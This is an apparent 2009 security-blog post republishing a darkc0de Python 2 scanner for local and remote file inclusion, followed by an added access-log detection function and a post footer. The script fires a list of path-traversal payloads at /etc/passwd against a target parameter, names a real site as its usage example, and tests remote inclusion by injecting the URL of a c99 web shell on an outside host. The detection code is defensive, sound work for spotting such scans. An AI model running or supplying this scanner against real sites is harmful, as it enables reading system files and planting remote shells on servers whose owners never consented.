This Python script was written by baltazar from darkc0de. It scans a target URL parameter for local file inclusion (LFI) and remote file inclusion (RFI); the RFI check attempts to make use of a c99 shell on a vulnerable host. It is a fast LFI and RFI scanner.
Code :
#!/usr/bin/python
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# !!! Special thanx for d3hydr8 and rsauron who inspired me !!!
#
# In version 2 added proxy support
#
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ _ __| _/____ #
# / __ |__ \_ __ |/ // ___/ /_ / __ |/ __ #
# / /_/ | / __ | | / < ___ _/ / /_/ ___/ #
# ____ |(______/__| |__|_ \_____>_____ /_____|____ #
# / / / #
# ___________ ______ _ __ #
# _/ ____ __ _/ __ / / / #
# ___| | / ___/ / #
# ___ >__| ___ >/_/ #
# est.2007 / / forum.darkc0de.com #
################################################################
# — d3hydr8 – rsauron – P47r1ck – r45c4l – C1c4Tr1Z – bennu #
# — QKrun1x – skillfaker – Croathack – Optyx – Nuclear #
# — Eliminator and to all members of darkc0de and ljuska.org# #
################################################################

import sys, os, time, re, urllib2, socket, httplib

if sys.platform == 'linux' or sys.platform == 'linux2':
    clearing = 'clear'
else:
    clearing = 'cls'
os.system(clearing)

proxy = "None"
count = 0

if len(sys.argv) < 2 or len(sys.argv) > 4:
    print "\n|---------------------------------------------------------------|"
    print "| b4ltazar[@]gmail[dot]com |"
    print "| 01/2009 LFI & RFI scanner v2.0 |"
    print "| Help: lfi-rfi.py -h |"
    print "| Visit www.darkc0de.com and www.ljuska.org |"
    print "|---------------------------------------------------------------|\n"
    sys.exit(1)

for arg in sys.argv:
    if arg == '-h' or arg == '--help' or arg == '-help':
        print "\n|---------------------------------------------------------------------------|"
        print "| b4ltazar[@]gmail[dot]com |"
        print "| 01/2009 LFI & RFI scanner v2.0 |"
        print "| Usage: lfi-rfi.py www.site.com |"
        print "| Example: lfi-rfi.py http://toscana.adiconsum.it/index.php?pagina= |"
        print "| Proxy: lfi-rfi.py http://toscana.adiconsum.it/index.php?pagina= -p PROXY |"
        print "| Visit www.darkc0de.com and www.ljuska.org |"
        print "|---------------------------------------------------------------------------|\n"
        sys.exit(1)
    elif arg == '-p':
        proxy = sys.argv[count+1]
    count += 1

lfis = ["/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../../etc/passwd%00","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]
site = sys.argv[1]
shell = 'http://www.defcont4.hypersite.com.br/shell/c99.txt?'
if site[:4] != "http":
    site = "http://"+site
if site[-1] != "=":
    site = site + "="

print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2009 LFI & RFI scanner v2.0 |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")
print "-"*80
print "\t\t\tChecking for LFI"
print "-"*80
print "\n[+] Target:",site
print "[+]",len(lfis),"LFI loaded..."
print "[+] Starting Scan...\n"

try:
    if proxy != "None":
        print "\n[+] Testing Proxy..."
        pr = httplib.HTTPConnection(proxy)
        pr.connect()
        print "[+] Proxy:",proxy
        print "[+] Building Handler"
        proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
    else:
        print "\n[-] Proxy not given"
        proxy_handler = ""
except(socket.timeout):
    print "\n[-] Proxy Timed Out"
    sys.exit(1)
except(),msg:
    print msg
    print "\n[-] Proxy Failed"
    sys.exit(1)

for lfi in lfis:
    print "[+] Checking:" ,site+lfi.replace("\n","")
    proxyfier = urllib2.build_opener(proxy_handler)
    try:
        check = proxyfier.open(site+lfi.replace("\n", "")).read()
        if re.findall("root:x:", check):
            print "[!] w00t!,w00t!: ",lfi
        else:
            print "[-] Not Found: ",lfi
    except(urllib2.HTTPError):
        pass
    except(KeyboardInterrupt, SystemExit):
        raise

print "-"*80
print "\t\t\tChecking for RFI"
print "-"*80
print "\n[+] Target:",site
print "[+] Starting Scan...\n"

try:
    check = proxyfier.open(site+'http://www.defcont4.hypersite.com.br/shell/c99.txt?').read()
    if re.findall("c99shell", check):
        print "[!] w00t!,w00t!: ",site+shell
    else:
        print "[-] Not Found: ",site+shell
except(urllib2.HTTPError):
    pass
except(KeyboardInterrupt, SystemExit):
    pass
print "\n[-] %s" % time.strftime("%X")
Download LFI – RFI scanner : http://packetstormsecurity.org/UNIX/scanners/lfi-rfi2.txt
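Seen from the server side, the script above produces a recognisable burst in the access log: one parameter requested with a growing number of `../` steps ending in `etc/passwd`, with and without `%00`, followed by a request whose parameter value is itself a URL. The log check below is an added example, not part of the original post or the author's script; the function names, the `min_depths` threshold and the log lines (documentation IP ranges, `files.example.net`) are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Combined log format: client address, request target and status are enough.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
# Zero or more "../" steps ending in etc/passwd, optionally null-terminated.
LFI_RE = re.compile(r'((?:\.\./)*)/?etc/passwd(\x00?)')
# A parameter value that is itself a URL is the RFI probe.
RFI_RE = re.compile(r'^(?:https?|ftp)://([^/?#]+)', re.I)

def scan_report(log_lines, min_depths=5):
    """Summarise inclusion probes per client. A client that walks through
    min_depths or more distinct traversal depths is flagged as a scanner."""
    seen = defaultdict(lambda: {"depths": set(), "null_byte": 0,
                                "rfi_hosts": set(), "ok": 0})
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        query = target.partition("?")[2]
        # parse_qsl percent-decodes once, so %00 arrives here as "\x00".
        for _name, value in parse_qsl(query, keep_blank_values=True):
            lfi, rfi = LFI_RE.search(value), RFI_RE.match(value)
            if not (lfi or rfi):
                continue
            entry = seen[client]
            # A 200 does not prove inclusion; it marks responses to review.
            entry["ok"] += status == "200"
            if lfi:
                entry["depths"].add(lfi.group(1).count("../"))
                entry["null_byte"] += bool(lfi.group(2))
            else:
                entry["rfi_hosts"].add(rfi.group(1).lower())
    return {c: dict(e, scanner=len(e["depths"]) >= min_depths)
            for c, e in seen.items()}

def sample_log():
    """Constructed access-log lines: one ordinary visitor, one scanning client."""
    fmt = ('{ip} - - [11/Jan/2009:10:00:{s:02d} +0000] '
           '"GET /index.php?page={v} HTTP/1.1" {st} 512')
    lines = [fmt.format(ip="198.51.100.20", s=0, v="news", st=200)]
    for depth in range(7):
        for s, suffix in ((2 * depth, "%00"), (2 * depth + 1, "")):
            value = ("../" * depth or "/") + "etc/passwd" + suffix
            lines.append(fmt.format(ip="203.0.113.7", s=s, v=value, st=200))
    lines.append(fmt.format(ip="203.0.113.7", s=20,
                            v="http://files.example.net/shell.txt?", st=200))
    return lines
```

Decoding here is single-pass, so values that arrive double-encoded need an extra unquote step before matching.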
Local – Remote file inclusion scanner (make use of a c99 shell) is posted on January 11th, 2009 by admin. This post is filed under: Sectools, Security, Communication, Free, HTTP, HTTP 404, Hypertext Transfer Protocol, Scan, Server, TinyURL .